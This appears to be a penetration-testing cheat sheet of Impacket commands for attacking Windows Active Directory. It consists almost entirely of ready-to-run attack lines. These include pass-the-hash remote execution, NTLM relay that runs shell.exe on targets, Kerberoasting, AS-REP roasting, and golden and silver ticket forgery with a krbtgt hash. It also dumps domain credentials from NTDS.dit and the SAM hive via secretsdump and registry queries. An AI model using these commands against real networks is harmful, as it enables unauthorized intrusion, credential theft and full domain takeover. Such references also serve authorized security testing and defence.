Impacket Python library with tools for SMB, MSRPC, Kerberos, NTLM, WMI, and AD attacks.
impacket-psexec domain/user:[email protected]
impacket-psexec domain/[email protected] -hashes :NTLMhash
impacket-smbexec domain/user:[email protected]
impacket-wmiexec domain/user:[email protected]
impacket-wmiexec domain/[email protected] -hashes :NTLMhash
impacket-ntlmrelayx -tf targets.txt -smb2support
impacket-ntlmrelayx -tf targets.txt -smb2support -i
impacket-ntlmrelayx -tf targets.txt -smb2support -e shell.exe
impacket-ntlmrelayx -t ldap://DC01 --escalate-user compromised_user
impacket-GetUserSPNs domain.local/user:password -dc-ip 10.10.10.1 -request
impacket-GetNPUsers domain.local/ -usersfile users.txt -no-pass -dc-ip 10.10.10.1
impacket-GetNPUsers domain.local/ -no-pass -dc-ip 10.10.10.1
impacket-ticketer -nthash NTLMhash -domain-sid S-1-5-21-xxx -domain domain.local -spn cifs/server.domain.local user
impacket-ticketer -nthash krbtgt_hash -domain-sid S-1-5-21-xxx -domain domain.local administrator
export KRB5CCNAME=/tmp/ticket.ccache && impacket-psexec -k -no-pass domain.local/user@server
impacket-secretsdump domain/user:[email protected]
impacket-secretsdump domain/[email protected] -hashes :NTLMhash
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
impacket-secretsdump domain/admin@DC01 -just-dc-ntlm
impacket-smbclient domain/user:[email protected]
impacket-smbclient domain/[email protected] -hashes :NTLMhash
impacket-lookupsid domain/user:[email protected]
impacket-rpcdump domain/user:[email protected]
impacket-reg domain/user:[email protected] query -keyName "HKLM\SAM"
impacket-mssqlclient domain/user:[email protected]
impacket-mssqlclient domain/user:[email protected] -windows-auth